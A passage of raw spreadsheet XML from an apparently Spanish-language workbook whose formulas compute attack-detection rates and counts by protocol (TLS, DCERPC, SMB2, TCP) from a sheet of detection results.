      <c r="EW11" s="732"/>
      <c r="EX11" s="730"/>
      <c r="EY11" s="730"/>
      <c r="EZ11" s="20" t="s">
        <v>2455</v>
      </c>
      <c r="FA11" s="336">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!IQ3:IQ139)</f>
        <v>0.6014944481</v>
      </c>
      <c r="FD11" s="173"/>
      <c r="FE11" s="173"/>
      <c r="FF11" s="173"/>
      <c r="FG11" s="173"/>
      <c r="FH11" s="173"/>
      <c r="FI11" s="173"/>
      <c r="FJ11" s="173"/>
      <c r="FK11" s="173"/>
      <c r="FL11" s="173"/>
      <c r="FM11" s="173"/>
      <c r="FN11" s="173"/>
      <c r="FO11" s="173"/>
      <c r="FP11" s="173"/>
      <c r="FQ11" s="173" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("UNIQUE(FILTER('(B) - Detecciones - Ataques'!L3:L139,'(B) - Detecciones - Ataques'!IS3:IS139=""✔"",'(B) - Detecciones - Ataques'!L3:L139&lt;&gt;""-""))"),"TLS")</f>
        <v>TLS</v>
      </c>
      <c r="FR11" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ11)</f>
        <v>0</v>
      </c>
      <c r="FS11" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ11)</f>
        <v>0.3333333333</v>
      </c>
      <c r="FT11" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ11)</f>
        <v>0.3333333333</v>
      </c>
      <c r="FU11" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ11)</f>
        <v>3</v>
      </c>
    </row>
    <row r="12">
      <c r="D12" s="434">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!M3:M139)</f>
        <v>95772</v>
      </c>
      <c r="E12" s="354">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!N3:N139)</f>
        <v>92544</v>
      </c>
      <c r="F12" s="350"/>
      <c r="G12" s="350"/>
      <c r="W12" s="173"/>
      <c r="X12" s="173"/>
      <c r="Y12" s="173"/>
      <c r="Z12" s="173"/>
      <c r="AA12" s="173"/>
      <c r="AB12" s="173"/>
      <c r="AC12" s="173"/>
      <c r="AD12" s="173"/>
      <c r="AE12" s="173"/>
      <c r="AF12" s="173"/>
      <c r="AG12" s="173"/>
      <c r="AH12" s="173"/>
      <c r="AI12" s="173"/>
      <c r="AJ12" s="173"/>
      <c r="AK12" s="173"/>
      <c r="AL12" s="173"/>
      <c r="AM12" s="173"/>
      <c r="AN12" s="173"/>
      <c r="AO12" s="173"/>
      <c r="AP12" s="173"/>
      <c r="AQ12" s="173"/>
      <c r="AR12" s="173"/>
      <c r="AS12" s="173"/>
      <c r="AT12" s="173"/>
      <c r="AU12" s="173"/>
      <c r="AV12" s="173"/>
      <c r="AW12" s="173"/>
      <c r="AX12" s="173"/>
      <c r="AY12" s="173"/>
      <c r="AZ12" s="173"/>
      <c r="BA12" s="173"/>
      <c r="BB12" s="173"/>
      <c r="BC12" s="173"/>
      <c r="BD12" s="173"/>
      <c r="BE12" s="173"/>
      <c r="BF12" s="173"/>
      <c r="BG12" s="173"/>
      <c r="BH12" s="173"/>
      <c r="BI12" s="173"/>
      <c r="BJ12" s="173"/>
      <c r="BK12" s="173"/>
      <c r="BL12" s="173"/>
      <c r="BM12" s="173"/>
      <c r="BN12" s="173"/>
      <c r="BO12" s="173"/>
      <c r="BP12" s="173"/>
      <c r="BQ12" s="173"/>
      <c r="BR12" s="173"/>
      <c r="BS12" s="173"/>
      <c r="BT12" s="173"/>
      <c r="BU12" s="173"/>
      <c r="BV12" s="173"/>
      <c r="BW12" s="173"/>
      <c r="BX12" s="173"/>
      <c r="BY12" s="173"/>
      <c r="BZ12" s="173"/>
      <c r="CA12" s="173"/>
      <c r="CB12" s="173"/>
      <c r="CC12" s="173"/>
      <c r="CD12" s="173"/>
      <c r="CE12" s="173"/>
      <c r="CF12" s="173"/>
      <c r="CG12" s="173"/>
      <c r="CH12" s="173"/>
      <c r="CI12" s="173"/>
      <c r="CJ12" s="173"/>
      <c r="CK12" s="173"/>
      <c r="CL12" s="173"/>
      <c r="CM12" s="173"/>
      <c r="CN12" s="173"/>
      <c r="CO12" s="173"/>
      <c r="CP12" s="173"/>
      <c r="CQ12" s="173"/>
      <c r="CR12" s="173"/>
      <c r="CS12" s="173"/>
      <c r="CT12" s="173"/>
      <c r="CU12" s="173"/>
      <c r="CV12" s="173"/>
      <c r="CW12" s="173"/>
      <c r="CX12" s="173"/>
      <c r="CY12" s="173"/>
      <c r="CZ12" s="173"/>
      <c r="DA12" s="173"/>
      <c r="DB12" s="173"/>
      <c r="DC12" s="173"/>
      <c r="DD12" s="616" t="s">
        <v>633</v>
      </c>
      <c r="DE12" s="726">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD12,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>5</v>
      </c>
      <c r="DF12" s="719">
        <v>5.0</v>
      </c>
      <c r="DG12" s="337">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="DH12" s="719">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="DI12" s="720">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="DJ12" s="719">
        <v>1.0</v>
      </c>
      <c r="DK12" s="20">
        <v>0.0</v>
      </c>
      <c r="DL12" s="20">
        <v>0.0</v>
      </c>
      <c r="DM12" s="20">
        <v>3.0</v>
      </c>
      <c r="DN12" s="336">
        <f t="shared" si="4"/>
        <v>0.6</v>
      </c>
      <c r="DO12" s="336">
        <f t="shared" si="5"/>
        <v>0.4</v>
      </c>
      <c r="DP12" s="721">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="DR12" s="610"/>
      <c r="DS12" s="610"/>
      <c r="DT12" s="619" t="s">
        <v>633</v>
      </c>
      <c r="DU12" s="612">
        <f>DF12/'(D) - Análisis Resultados I - S'!EB31</f>
        <v>1.25</v>
      </c>
      <c r="DV12" s="173"/>
      <c r="DW12" s="619" t="s">
        <v>633</v>
      </c>
      <c r="DX12" s="612">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="DY12" s="722">
        <v>1.0</v>
      </c>
      <c r="DZ12" s="722"/>
      <c r="EA12" s="722"/>
      <c r="EE12" s="627" t="s">
        <v>2662</v>
      </c>
      <c r="EF12" s="590" t="s">
        <v>2714</v>
      </c>
      <c r="EG12" s="590" t="s">
        <v>2715</v>
      </c>
      <c r="EH12" s="590" t="s">
        <v>2652</v>
      </c>
      <c r="EI12" s="591" t="s">
        <v>2653</v>
      </c>
      <c r="EJ12" s="403"/>
      <c r="EK12" s="403"/>
      <c r="EL12" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP4&lt;&gt;0,'(B) - Detecciones - Ataques'!IP4*'(B) - Detecciones - Ataques'!IL4/('(B) - Detecciones - Ataques'!IL4+'(B) - Detecciones - Ataques'!IN4),0)</f>
        <v>0</v>
      </c>
      <c r="EM12" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP4&lt;&gt;0,'(B) - Detecciones - Ataques'!IP4*'(B) - Detecciones - Ataques'!IN4/('(B) - Detecciones - Ataques'!IL4+'(B) - Detecciones - Ataques'!IN4),0)</f>
        <v>0</v>
      </c>
      <c r="EN12" s="626"/>
      <c r="EO12" s="626"/>
      <c r="EP12" s="729"/>
      <c r="EQ12" s="730"/>
      <c r="ER12" s="731" t="s">
        <v>951</v>
      </c>
      <c r="ES12" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER12)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER12 &amp; "*")</f>
        <v>7</v>
      </c>
      <c r="ET12" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER12)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER12 &amp; "*")</f>
        <v>10</v>
      </c>
      <c r="EU12" s="728">
        <f t="shared" si="8"/>
        <v>0.7</v>
      </c>
      <c r="EV12" s="730"/>
      <c r="EW12" s="732"/>
      <c r="EX12" s="730"/>
      <c r="EY12" s="730"/>
      <c r="EZ12" s="20" t="s">
        <v>2456</v>
      </c>
      <c r="FA12" s="336">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!IR3:IR139)</f>
        <v>0.7045454545</v>
      </c>
      <c r="FD12" s="173"/>
      <c r="FE12" s="173"/>
      <c r="FF12" s="173"/>
      <c r="FG12" s="173"/>
      <c r="FH12" s="173"/>
      <c r="FI12" s="173"/>
      <c r="FJ12" s="173"/>
      <c r="FK12" s="173"/>
      <c r="FL12" s="173"/>
      <c r="FM12" s="173"/>
      <c r="FN12" s="173"/>
      <c r="FO12" s="173"/>
      <c r="FP12" s="173"/>
      <c r="FQ12" s="173" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DCERPC")</f>
        <v>DCERPC</v>
      </c>
      <c r="FR12" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ12)</f>
        <v>0.6666666667</v>
      </c>
      <c r="FS12" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ12)</f>
        <v>0.6666666667</v>
      </c>
      <c r="FT12" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ12)</f>
        <v>0.6666666667</v>
      </c>
      <c r="FU12" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ12)</f>
        <v>3</v>
      </c>
    </row>
    <row r="13">
      <c r="D13" s="434"/>
      <c r="E13" s="354"/>
      <c r="F13" s="377"/>
      <c r="G13" s="377"/>
      <c r="W13" s="173"/>
      <c r="X13" s="173"/>
      <c r="Y13" s="173"/>
      <c r="Z13" s="173"/>
      <c r="AA13" s="173"/>
      <c r="AB13" s="173"/>
      <c r="AC13" s="173"/>
      <c r="AD13" s="173"/>
      <c r="AE13" s="173"/>
      <c r="AF13" s="173"/>
      <c r="AG13" s="173"/>
      <c r="AH13" s="173"/>
      <c r="AI13" s="173"/>
      <c r="AJ13" s="173"/>
      <c r="AK13" s="173"/>
      <c r="AL13" s="173"/>
      <c r="AM13" s="173"/>
      <c r="AN13" s="173"/>
      <c r="AO13" s="173"/>
      <c r="AP13" s="173"/>
      <c r="AQ13" s="173"/>
      <c r="AR13" s="173"/>
      <c r="AS13" s="173"/>
      <c r="AT13" s="173"/>
      <c r="AU13" s="173"/>
      <c r="AV13" s="173"/>
      <c r="AW13" s="173"/>
      <c r="AX13" s="173"/>
      <c r="AY13" s="173"/>
      <c r="AZ13" s="173"/>
      <c r="BA13" s="173"/>
      <c r="BB13" s="173"/>
      <c r="BC13" s="173"/>
      <c r="BD13" s="173"/>
      <c r="BE13" s="173"/>
      <c r="BF13" s="173"/>
      <c r="BG13" s="173"/>
      <c r="BH13" s="173"/>
      <c r="BI13" s="173"/>
      <c r="BJ13" s="173"/>
      <c r="BK13" s="173"/>
      <c r="BL13" s="173"/>
      <c r="BM13" s="173"/>
      <c r="BN13" s="173"/>
      <c r="BO13" s="173"/>
      <c r="BP13" s="173"/>
      <c r="BQ13" s="173"/>
      <c r="BR13" s="173"/>
      <c r="BS13" s="173"/>
      <c r="BT13" s="173"/>
      <c r="BU13" s="173"/>
      <c r="BV13" s="173"/>
      <c r="BW13" s="173"/>
      <c r="BX13" s="173"/>
      <c r="BY13" s="173"/>
      <c r="BZ13" s="173"/>
      <c r="CA13" s="173"/>
      <c r="CB13" s="173"/>
      <c r="CC13" s="173"/>
      <c r="CD13" s="173"/>
      <c r="CE13" s="173"/>
      <c r="CF13" s="173"/>
      <c r="CG13" s="173"/>
      <c r="CH13" s="173"/>
      <c r="CI13" s="173"/>
      <c r="CJ13" s="173"/>
      <c r="CK13" s="173"/>
      <c r="CL13" s="173"/>
      <c r="CM13" s="173"/>
      <c r="CN13" s="173"/>
      <c r="CO13" s="173"/>
      <c r="CP13" s="173"/>
      <c r="CQ13" s="173"/>
      <c r="CR13" s="173"/>
      <c r="CS13" s="173"/>
      <c r="CT13" s="173"/>
      <c r="CU13" s="173"/>
      <c r="CV13" s="173"/>
      <c r="CW13" s="173"/>
      <c r="CX13" s="173"/>
      <c r="CY13" s="173"/>
      <c r="CZ13" s="173"/>
      <c r="DA13" s="173"/>
      <c r="DB13" s="173"/>
      <c r="DC13" s="173"/>
      <c r="DD13" s="628" t="s">
        <v>1725</v>
      </c>
      <c r="DE13" s="719" t="s">
        <v>12</v>
      </c>
      <c r="DF13" s="719" t="s">
        <v>12</v>
      </c>
      <c r="DG13" s="629" t="s">
        <v>2716</v>
      </c>
      <c r="DH13" s="719" t="s">
        <v>12</v>
      </c>
      <c r="DI13" s="719" t="s">
        <v>12</v>
      </c>
      <c r="DJ13" s="719" t="s">
        <v>12</v>
      </c>
      <c r="DK13" s="20">
        <v>0.0</v>
      </c>
      <c r="DL13" s="20">
        <v>0.0</v>
      </c>
      <c r="DM13" s="20" t="s">
        <v>12</v>
      </c>
      <c r="DN13" s="20" t="s">
        <v>2716</v>
      </c>
      <c r="DO13" s="20" t="s">
        <v>2716</v>
      </c>
      <c r="DP13" s="733" t="s">
        <v>12</v>
      </c>
      <c r="DR13" s="610"/>
      <c r="DS13" s="610"/>
      <c r="DT13" s="619" t="s">
        <v>1725</v>
      </c>
      <c r="DU13" s="612">
        <v>0.0</v>
      </c>
      <c r="DV13" s="173"/>
      <c r="DW13" s="619" t="s">
        <v>1725</v>
      </c>
      <c r="DX13" s="612">
        <v>0.0</v>
      </c>
      <c r="DY13" s="722"/>
      <c r="DZ13" s="722"/>
      <c r="EA13" s="722"/>
      <c r="EE13" s="636"/>
      <c r="EF13" s="69"/>
      <c r="EG13" s="69"/>
      <c r="EH13" s="336"/>
      <c r="EI13" s="337"/>
      <c r="EJ13" s="336"/>
      <c r="EK13" s="336"/>
      <c r="EL13" s="626"/>
      <c r="EM13" s="626"/>
      <c r="EN13" s="626"/>
      <c r="EO13" s="626"/>
      <c r="EP13" s="729"/>
      <c r="EQ13" s="730"/>
      <c r="ER13" s="734"/>
      <c r="ES13" s="724"/>
      <c r="ET13" s="724"/>
      <c r="EU13" s="735"/>
      <c r="EV13" s="730"/>
      <c r="EW13" s="732"/>
      <c r="EX13" s="730"/>
      <c r="EY13" s="730"/>
      <c r="EZ13" s="20"/>
      <c r="FA13" s="336"/>
      <c r="FD13" s="173"/>
      <c r="FE13" s="173"/>
      <c r="FF13" s="173"/>
      <c r="FG13" s="173"/>
      <c r="FH13" s="173"/>
      <c r="FI13" s="173"/>
      <c r="FJ13" s="173"/>
      <c r="FK13" s="173"/>
      <c r="FL13" s="173"/>
      <c r="FM13" s="173"/>
      <c r="FN13" s="173"/>
      <c r="FO13" s="173"/>
      <c r="FP13" s="173"/>
      <c r="FQ13" s="173" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB2")</f>
        <v>SMB2</v>
      </c>
      <c r="FR13" s="336"/>
      <c r="FS13" s="336"/>
      <c r="FT13" s="375"/>
      <c r="FU13" s="173"/>
    </row>
    <row r="14">
      <c r="D14" s="434"/>
      <c r="E14" s="354"/>
      <c r="F14" s="377"/>
      <c r="G14" s="377"/>
      <c r="W14" s="173"/>
      <c r="X14" s="173"/>
      <c r="Y14" s="173"/>
      <c r="Z14" s="173"/>
      <c r="AA14" s="173"/>
      <c r="AB14" s="173"/>
      <c r="AC14" s="173"/>
      <c r="AD14" s="173"/>
      <c r="AE14" s="173"/>
      <c r="AF14" s="173"/>
      <c r="AG14" s="173"/>
      <c r="AH14" s="173"/>
      <c r="AI14" s="173"/>
      <c r="AJ14" s="173"/>
      <c r="AK14" s="173"/>
      <c r="AL14" s="173"/>
      <c r="AM14" s="173"/>
      <c r="AN14" s="173"/>
      <c r="AO14" s="173"/>
      <c r="AP14" s="173"/>
      <c r="AQ14" s="173"/>
      <c r="AR14" s="173"/>
      <c r="AS14" s="173"/>
      <c r="AT14" s="173"/>
      <c r="AU14" s="173"/>
      <c r="AV14" s="173"/>
      <c r="AW14" s="173"/>
      <c r="AX14" s="173"/>
      <c r="AY14" s="173"/>
      <c r="AZ14" s="173"/>
      <c r="BA14" s="173"/>
      <c r="BB14" s="173"/>
      <c r="BC14" s="173"/>
      <c r="BD14" s="173"/>
      <c r="BE14" s="173"/>
      <c r="BF14" s="173"/>
      <c r="BG14" s="173"/>
      <c r="BH14" s="173"/>
      <c r="BI14" s="173"/>
      <c r="BJ14" s="173"/>
      <c r="BK14" s="173"/>
      <c r="BL14" s="173"/>
      <c r="BM14" s="173"/>
      <c r="BN14" s="173"/>
      <c r="BO14" s="173"/>
      <c r="BP14" s="173"/>
      <c r="BQ14" s="173"/>
      <c r="BR14" s="173"/>
      <c r="BS14" s="173"/>
      <c r="BT14" s="173"/>
      <c r="BU14" s="173"/>
      <c r="BV14" s="173"/>
      <c r="BW14" s="173"/>
      <c r="BX14" s="173"/>
      <c r="BY14" s="173"/>
      <c r="BZ14" s="173"/>
      <c r="CA14" s="173"/>
      <c r="CB14" s="173"/>
      <c r="CC14" s="173"/>
      <c r="CD14" s="173"/>
      <c r="CE14" s="173"/>
      <c r="CF14" s="173"/>
      <c r="CG14" s="173"/>
      <c r="CH14" s="173"/>
      <c r="CI14" s="173"/>
      <c r="CJ14" s="173"/>
      <c r="CK14" s="173"/>
      <c r="CL14" s="173"/>
      <c r="CM14" s="173"/>
      <c r="CN14" s="173"/>
      <c r="CO14" s="173"/>
      <c r="CP14" s="173"/>
      <c r="CQ14" s="173"/>
      <c r="CR14" s="173"/>
      <c r="CS14" s="173"/>
      <c r="CT14" s="173"/>
      <c r="CU14" s="173"/>
      <c r="CV14" s="173"/>
      <c r="CW14" s="173"/>
      <c r="CX14" s="173"/>
      <c r="CY14" s="173"/>
      <c r="CZ14" s="173"/>
      <c r="DA14" s="173"/>
      <c r="DB14" s="173"/>
      <c r="DC14" s="173"/>
      <c r="DD14" s="616" t="s">
        <v>244</v>
      </c>
      <c r="DE14" s="726">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>12</v>
      </c>
      <c r="DF14" s="719">
        <v>7.0</v>
      </c>
      <c r="DG14" s="337">
        <f t="shared" ref="DG14:DG20" si="9">DF14/DE14</f>
        <v>0.5833333333</v>
      </c>
      <c r="DH14" s="719">
        <f t="shared" ref="DH14:DH23" si="10">DE14-DF14</f>
        <v>5</v>
      </c>
      <c r="DI14" s="720">
        <f t="shared" ref="DI14:DI20" si="11">1-DG14</f>
        <v>0.4166666667</v>
      </c>
      <c r="DJ14" s="719">
        <v>1.0</v>
      </c>
      <c r="DK14" s="20"/>
      <c r="DL14" s="20">
        <v>0.0</v>
      </c>
      <c r="DM14" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>12</v>
      </c>
      <c r="DN14" s="336">
        <f t="shared" ref="DN14:DN23" si="12">DM14/DE14</f>
        <v>1</v>
      </c>
      <c r="DO14" s="336">
        <f t="shared" ref="DO14:DO23" si="13">1-DN14</f>
        <v>0</v>
      </c>
      <c r="DP14" s="721">
        <f t="shared" ref="DP14:DP22" si="14">DF14+DJ14</f>
        <v>8</v>
      </c>
      <c r="DR14" s="610"/>
      <c r="DS14" s="610"/>
      <c r="DT14" s="619" t="s">
        <v>244</v>
      </c>
      <c r="DU14" s="612">
        <f>DF14/'(D) - Análisis Resultados I - S'!EB33</f>
        <v>1</v>
      </c>
      <c r="DV14" s="173"/>
      <c r="DW14" s="619" t="s">
        <v>244</v>
      </c>
      <c r="DX14" s="612">
        <f t="shared" ref="DX14:DX20" si="15">DF14/DE14</f>
        <v>0.5833333333</v>
      </c>
      <c r="DY14" s="722">
        <v>0.58</v>
      </c>
      <c r="DZ14" s="722"/>
      <c r="EA14" s="722"/>
      <c r="EE14" s="636" t="s">
        <v>2093</v>
      </c>
      <c r="EF14" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG14" s="69" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH14" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EI14" s="337" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE14,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE14  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EJ14" s="336"/>
      <c r="EK14" s="336"/>
      <c r="EL14" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP5&lt;&gt;0,'(B) - Detecciones - Ataques'!IP5*'(B) - Detecciones - Ataques'!IL5/('(B) - Detecciones - Ataques'!IL5+'(B) - Detecciones - Ataques'!IN5),0)</f>
        <v>1</v>
      </c>
      <c r="EM14" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP5&lt;&gt;0,'(B) - Detecciones - Ataques'!IP5*'(B) - Detecciones - Ataques'!IN5/('(B) - Detecciones - Ataques'!IL5+'(B) - Detecciones - Ataques'!IN5),0)</f>
        <v>0</v>
      </c>
      <c r="EN14" s="626"/>
      <c r="EO14" s="626"/>
      <c r="EP14" s="729"/>
      <c r="EQ14" s="730"/>
      <c r="ER14" s="734"/>
      <c r="ES14" s="724"/>
      <c r="ET14" s="724"/>
      <c r="EU14" s="735"/>
      <c r="EV14" s="730"/>
      <c r="EW14" s="732"/>
      <c r="EX14" s="730"/>
      <c r="EY14" s="730"/>
      <c r="EZ14" s="20"/>
      <c r="FA14" s="336"/>
      <c r="FD14" s="173"/>
      <c r="FE14" s="173"/>
      <c r="FF14" s="173"/>
      <c r="FG14" s="173"/>
      <c r="FH14" s="173"/>
      <c r="FI14" s="173"/>
      <c r="FJ14" s="173"/>
      <c r="FK14" s="173"/>
      <c r="FL14" s="173"/>
      <c r="FM14" s="173"/>
      <c r="FN14" s="173"/>
      <c r="FO14" s="173"/>
      <c r="FP14" s="173"/>
      <c r="FQ14" s="173" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"TCP")</f>
        <v>TCP</v>
      </c>
      <c r="FR14" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ14)</f>
        <v>0.3888888889</v>
      </c>
      <c r="FS14" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ14)</f>
        <v>0.4444444444</v>
      </c>
      <c r="FT14" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ14)</f>
        <v>0.5</v>
      </c>
      <c r="FU14" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ14)</f>
        <v>18</v>
      </c>
    </row>
    <row r="15">
      <c r="D15" s="340" t="s">
        <v>2666</v>
      </c>
      <c r="E15" s="341" t="s">
        <v>2667</v>
      </c>
      <c r="G15" s="291" t="s">
        <v>2668</v>
      </c>
      <c r="H15" s="292"/>
      <c r="I15" s="292"/>
      <c r="J15" s="292"/>
